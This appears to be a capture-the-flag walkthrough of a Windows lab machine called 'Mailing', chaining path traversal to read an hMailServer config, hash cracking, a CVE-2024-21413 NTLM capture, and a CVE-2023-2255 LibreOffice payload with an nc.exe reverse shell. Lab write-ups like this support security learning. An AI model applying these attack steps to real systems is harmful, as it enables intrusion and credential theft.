Mailing is an easy Windows machine that runs hMailServer and hosts a website vulnerable to Path Traversal . This vulnerability can be exploited to access the hMailServer configuration file, revealing the Administrator password hash. Cracking this hash provides the Administrator password for the email account. We leverage CVE-2024-21413 in the Windows Mail application on the remote host to capture the NTLM hash for user maya . We can then crack this hash to obtain the password and log in as user maya via WinRM. For privilege escalation, we exploit CVE-2023-2255 in LibreOffice.

Enumeration

Let’s start by doing our usual NMAP scans of the machine.

sudo nmap -sC -sV 10.129.231.40 -oA nmap_1000

Full ports.

sudo nmap -p- 10.129.231.40 -oA nmap_full

Let’s add an entry for mailing.htb in our /etc/hosts file with the corresponding IP address to
resolve the domain name and allow us to access it in our browser.

echo "10.129.231.40 mailing.htb" | sudo tee -a /etc/hosts

SMB Null Session

Attempting to establish an SMB null session was unsuccessful.

I decided to shift focus to exploring the web service, as it seemed more interesting and relevant for further investigation.

Website - TCP 80

Site

The website is for an organization that provides a mail server:

There are three notable names on the site.

The “Download Instructions” button links to http://mailing.htb/download.php?file=instructions.pdf. This 16-page PDF contains setup instructions for mail clients on Windows and Ubuntu, covering both Windows Mail and Thunderbird. One key detail in the document is the example email address:

maya@mailing.htb.

This matches a previously noted name, suggesting that the other two users are likely ruy@mailing.htb and gregory@mailing.htb.

After gathering all this information, I proceeded to search for known exploits related to hMailServer using searchsploit:

searchsploit hMailServer

From the results, I discovered a file inclusion vulnerability for hMailServer 4.4.2 in the PHPWebAdmin interface. However, since my setup doesn’t include PHPWebAdmin (I have only the mail server), I suspected that the endpoint /download.php?file=instructions.pdf might be vulnerable instead. To further investigate, I downloaded the exploit using searchsploit:

Upon reviewing the exploit:

This vulnerability allows local file inclusion, which could be exploited to access sensitive configuration files.

We can verify the path traversal vulnerability by modifying the filename parameter in the URL to
try to read the windows.ini file using the following payload.

Since the server is running hMailServer, we can use a Google search to identify the location of its configuration file. The search reveals that the file is located at C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini. Next, let’s attempt to read this file using the following URL-encoded payload.

There are two hashes stored as AdministratorPassword and Password.

Crack Passowrd

The password hashes are in MD5 format, so I used CrackStation to decrypt them:

The administrator password was revealed to be homenetworkingadministrator.

Verifying Credentials

I used Thunderbird to test the credentials and successfully logged in as the administrator using the password homenetworkingadministrator.

Foothold

Since the remote Windows server is running a mail server, it is also likely using a mail client to connect to it. The default mail client for Windows is Windows Mail. Based on the installation PDF, I suspected they were likely using this client. Searching for Windows Mail vulnerabilities led me to CVE-2024-21413, also known as the Moniker Link bug.

The root cause of this vulnerability lies in how Windows Mail interprets certain hypertext links, particularly those utilizing COM Monikers technology. If a link directs to an SMB share (formatted as \\<Malicious_IP>\file), Windows Mail will automatically attempt to authenticate with the malicious remote server using the NTLM hash of the current user, which the remote server can then capture for malicious purposes.

A Google search revealed a GitHub repository with a proof of concept (PoC) for CVE-2024-21413, which just generates the HTML email and sends it. I’ll clone this repo to my host: 

git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability && cd CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

I run a proof of concept (PoC) to send the email and started smbserver in another window to capture NTLM hashes:

Crack

We attempt to crack this password hash using hashcat

Winrm

I used the obtained password m4y4ngs4ri to log in as user maya via WinRM.

i can obtain user flag.

Privilege Escalation

While enumerating the filesystem, we discover that LibreOffice is installed on the system.

The installed version of LibreOffice is:

With the version information for LibreOffice, we can search for related exploits and find that this version is vulnerable to CVE-2023-2255. This vulnerability involves improper access control in LibreOffice’s editor components, allowing an attacker to create a document that loads external links without user prompts. Assuming a system user is opening files with LibreOffice, we can exploit this by uploading a malicious file to the system and waiting for the user to open it, triggering our payload. A proof of concept (PoC) for generating the malicious payload can be found here. Let’s clone this GitHub repository to our local system.

git clone https://github.com/elweth-sec/CVE-2023-2255.git

Following the PoC instructions, we run the Python script to generate a malicious .odt payload to ping ourselves:

After verifying that the exploit works properly, I upload nc.exe and my malicious .odt payload to obtain a reverse shell: